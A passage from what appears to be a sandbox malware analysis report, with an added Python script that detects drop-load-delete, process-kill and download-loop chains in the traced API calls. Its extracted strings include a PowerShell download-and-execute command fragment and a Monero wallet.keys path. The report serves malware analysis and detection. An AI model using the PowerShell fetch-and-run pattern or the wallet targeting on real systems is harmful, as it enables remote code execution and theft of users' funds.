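Three of the API chains in the entries above are the ones a detection engineer would want to pull out of this report mechanically: the CreateFileA(GENERIC_WRITE) / LoadLibraryA / DeleteFileA sequence on C:\ProgramData\chrome.dll, the CreateToolhelp32Snapshot / OpenProcess(0x1) / TerminateProcess subcall at 004F99A0 that follows the Sleep(0x1388), and the InternetOpenUrlA / InternetReadFile loop with dwFlags 0x04000100. The Python below is an added example, not Joe Sandbox tooling or the sample's code: it parses trace lines in exactly the format printed on this page, decodes the hex arguments against Windows SDK constants, and flags the three chains. The sample trace is constructed from lines that appear on this page; the flag and access-mask values are the SDK definitions.

```python
"""Behavioural triage of a Joe Sandbox API trace (added example, not Joe Sandbox code).

Parses the '• Api.MODULE(args), ref: ADDR' lines printed under each function and
flags three chains visible on this page: a DLL written, loaded and deleted;
Toolhelp32 process enumeration ending in TerminateProcess; and a WinINet download
loop. SAMPLE_TRACE is constructed from lines on the page; constants are SDK values.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")
GENERIC_WRITE = 0x40000000      # CreateFileA dwDesiredAccess
PROCESS_TERMINATE = 0x0001      # OpenProcess dwDesiredAccess
WININET_FLAGS = [               # InternetOpenUrlA dwFlags (wininet.h), ascending bit order
    (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE"), (0x00800000, "INTERNET_FLAG_SECURE"),
    (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"), (0x80000000, "INTERNET_FLAG_RELOAD")]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]      # address from 'Part of subcall function', if any


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:                   # section labels and blank lines do not match
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def as_int(arg: str) -> Optional[int]:
    """Hex trace argument as int; '?' (unknown to the tracer) or a string becomes None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def paths_in(call: ApiCall) -> List[str]:
    return [a for a in call.args if PATH_RE.match(a)]


def drop_load_delete(calls: List[ApiCall]) -> List[str]:
    """Files opened for writing, then passed to LoadLibraryA, then deleted."""
    written = {p.lower(): p for c in calls if c.api == "CreateFileA"
               and len(c.args) > 1 and as_int(c.args[1]) == GENERIC_WRITE
               for p in paths_in(c)}
    loaded = {p.lower() for c in calls if c.api == "LoadLibraryA" for p in paths_in(c)}
    deleted = {p.lower() for c in calls if c.api == "DeleteFileA" for p in paths_in(c)}
    return [p for k, p in written.items() if k in loaded and k in deleted]


def process_kill_chains(calls: List[ApiCall]) -> List[dict]:
    """Subcall functions that snapshot processes, open one and terminate it, in that order."""
    by_sub: dict = {}
    for c in calls:
        by_sub.setdefault(c.subcall, []).append(c)
    found = []
    for sub, seq in by_sub.items():
        apis = [c.api for c in seq]
        idx = [apis.index(x) if x in apis else -1
               for x in ("CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess")]
        if idx[0] < 0 or not idx[0] < idx[1] < idx[2]:
            continue
        access = as_int(seq[idx[1]].args[0]) if seq[idx[1]].args else None
        found.append({"subcall": sub, "terminate_only": access == PROCESS_TERMINATE})
    return found


def decode_flags(value: int) -> List[str]:
    return [name for bit, name in WININET_FLAGS if value & bit]


def download_loops(calls: List[ApiCall]) -> List[dict]:
    """InternetOpenUrlA followed by InternetReadFile, with dwFlags and chunk size decoded."""
    out = []
    for i, c in enumerate(calls):
        if c.api != "InternetOpenUrlA" or len(c.args) < 5:
            continue
        read = next((r for r in calls[i + 1:] if r.api == "InternetReadFile"), None)
        chunk = as_int(read.args[2]) if read and len(read.args) > 2 else None
        out.append({"ref": c.ref, "flags": decode_flags(as_int(c.args[4]) or 0), "read_chunk": chunk})
    return out


# Constructed from trace lines on this page (three different functions).
SAMPLE_TRACE = r"""
  • Part of subcall function 004F9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004F08DC,C:\ProgramData\chrome.dll), ref: 004F9871
  • Part of subcall function 004EA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004EA098
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004F0C35
• wsprintfA.USER32 ref: 004E9E7F
• Sleep.KERNEL32(00001388), ref: 004EA013
  • Part of subcall function 004F99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F99C5
  • Part of subcall function 004F99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F9A4E
  • Part of subcall function 004F99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F9A6C
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004E5061
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 004E5091
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    print("drop/load/delete:", drop_load_delete(calls))
    print("process kill chains:", process_kill_chains(calls))
    print("download loops:", download_loops(calls))
```

Two decoded values are worth carrying into a rule: OpenProcess with dwDesiredAccess 0x1 is PROCESS_TERMINATE and nothing else, so the 004F99A0 loop exists only to kill processes it matches by name, and 0x04000100 on InternetOpenUrlA is INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE, so the fetch leaves no entry in the WinINet cache for forensics. The Sleep argument 0x1388 is 5000 ms.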
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004F85B6
                                        • wsprintfA.USER32 ref: 004F85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004F860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F8629
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,0145E070,00000000,000F003F,?,00000400), ref: 004F867C
                                        • lstrlen.KERNEL32(?), ref: 004F8691
                                        • RegQueryValueExA.ADVAPI32(00000000,0145DF98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00500B3C), ref: 004F8729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F8798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F87AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 2d0777d3f1addcc37eb18c16d9f512861a1275860e205536c58200546b46b8ce
                                        • Instruction ID: d2da06ef8618731cf16fce5d0e767fce3d708a6b91a4bf8edeef325e14d768ee
                                        • Opcode Fuzzy Hash: 2d0777d3f1addcc37eb18c16d9f512861a1275860e205536c58200546b46b8ce
                                        • Instruction Fuzzy Hash: EF21EB7191421C9BDB24DB54DC85FE9B3B8FB88704F10C1D9A609A6180DF756A85CFE8
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F99C5
                                        • Process32First.KERNEL32(004EA056,00000128), ref: 004F99D9
                                        • Process32Next.KERNEL32(004EA056,00000128), ref: 004F99F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F9A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F9A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 004F9A79
                                        • CloseHandle.KERNEL32(004EA056), ref: 004F9A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 20a72dee9dab43a6c49c82866c4a30c04900dbb7bfe707a8abb86b2f92163fc6
                                        • Instruction ID: 33fb465b89c3477154a6ac3a9f970413d87ab2e756a5396dd5081540552595c3
                                        • Opcode Fuzzy Hash: 20a72dee9dab43a6c49c82866c4a30c04900dbb7bfe707a8abb86b2f92163fc6
                                        • Instruction Fuzzy Hash: 4221ED7190421CABDB25DF65DC89BEEB7B9BB88300F1081C9E609A6290D7789E84CF54
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0144C150,00000000,00020119,00000000), ref: 004F786D
                                        • RegQueryValueExA.ADVAPI32(00000000,0145E088,00000000,00000000,?,000000FF), ref: 004F788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004F7898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 592c3d4abf192b03d5c22c774089b351e1042b487ce017ae4a55f58a31225b51
                                        • Instruction ID: 1559809db0e1f2997f52bbf6469a647b82cdabdf4fee30dae11ffad8bc3111af
                                        • Opcode Fuzzy Hash: 592c3d4abf192b03d5c22c774089b351e1042b487ce017ae4a55f58a31225b51
                                        • Instruction Fuzzy Hash: 7B01F475A44309BBEB04DBE4DD49FAE7778EB88700F108155F705A7291D67C9900CB69
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F78C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F78CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0144C150,00000000,00020119,004F7849), ref: 004F78EB
                                        • RegQueryValueExA.ADVAPI32(004F7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 004F790A
                                        • RegCloseKey.ADVAPI32(004F7849), ref: 004F7914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 66b767a018333c4c3d67124f7ee629b5ca5390678e3c691f779695214f600d08
                                        • Instruction ID: 01937cd967e6ff2c470efe13f816e7c85505cbf3854da1e1d4235f286fcc2e36
                                        • Opcode Fuzzy Hash: 66b767a018333c4c3d67124f7ee629b5ca5390678e3c691f779695214f600d08
                                        • Instruction Fuzzy Hash: D301F4B5A44309BFEB04DBE4DC49FAE7778FB48700F108599F605A6281D7B85A10CBA4
                                        APIs
                                        • CreateFileA.KERNEL32(>=O,80000000,00000003,00000000,00000003,00000080,00000000,?,004F3D3E,?), ref: 004F948C
                                        • GetFileSizeEx.KERNEL32(000000FF,>=O), ref: 004F94A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 004F94B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: >=O$>=O
                                        • API String ID: 1378416451-2321104598
                                        • Opcode ID: d21db310b930ca3b88b8e4ed012d3297ad60587c181e70663a8c0dfe65f26c0e
                                        • Instruction ID: 3cbfc6e6c3580d14c02d5f2c4c1bbb4393769897dc5aae0bb7b239fc61da54b5
                                        • Opcode Fuzzy Hash: d21db310b930ca3b88b8e4ed012d3297ad60587c181e70663a8c0dfe65f26c0e
                                        • Instruction Fuzzy Hash: CFF03135E0820CBBDB14DFB4DC49F5E77B9AB98710F10C655FA11A7280D6789A01CB54
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                        • LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 77f37f90752850c313f747313a49c2dc61850a9608b5cbe66238f6a0c32eff92
                                        • Instruction ID: bef16fb7505f7fcc0b3654851fc5d47fd407edf1e25fe1bafefa93f8a56a94a3
                                        • Opcode Fuzzy Hash: 77f37f90752850c313f747313a49c2dc61850a9608b5cbe66238f6a0c32eff92
                                        • Instruction Fuzzy Hash: DB312F74A00209EFDB14CF95C885FEEB7B5BF48305F108159E911A7390D778AA91CFA5
                                        APIs
                                        • lstrcat.KERNEL32(?,0145E358), ref: 004F4A2B
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F4A51
                                        • lstrcat.KERNEL32(?,?), ref: 004F4A70
                                        • lstrcat.KERNEL32(?,?), ref: 004F4A84
                                        • lstrcat.KERNEL32(?,0144BAC0), ref: 004F4A97
                                        • lstrcat.KERNEL32(?,?), ref: 004F4AAB
                                        • lstrcat.KERNEL32(?,0145DB80), ref: 004F4ABF
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004F8F20: GetFileAttributesA.KERNEL32(00000000,?,004E1B94,?,?,0050577C,?,?,00500E22), ref: 004F8F2F
                                          • Part of subcall function 004F47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004F47D0
                                          • Part of subcall function 004F47C0: RtlAllocateHeap.NTDLL(00000000), ref: 004F47D7
                                          • Part of subcall function 004F47C0: wsprintfA.USER32 ref: 004F47F6
                                          • Part of subcall function 004F47C0: FindFirstFileA.KERNEL32(?,?), ref: 004F480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: cf3e262bb54edbaef711ebd90b8e5da4449c6a32e1e028011808f5c0ef39bcf6
                                        • Instruction ID: b5132beaffa3310e609909b0bb345d933badea75c3cc93da3dcc398e4115ceec
                                        • Opcode Fuzzy Hash: cf3e262bb54edbaef711ebd90b8e5da4449c6a32e1e028011808f5c0ef39bcf6
                                        • Instruction Fuzzy Hash: 363132B290021C67DF15E7B0DC95EED7338AB48704F40468EB355AA051DE78AA88CB98
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F2FD5
                                        Strings
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004F2F14
                                        • ')", xrefs: 004F2F03
                                        • <, xrefs: 004F2F89
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004F2F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
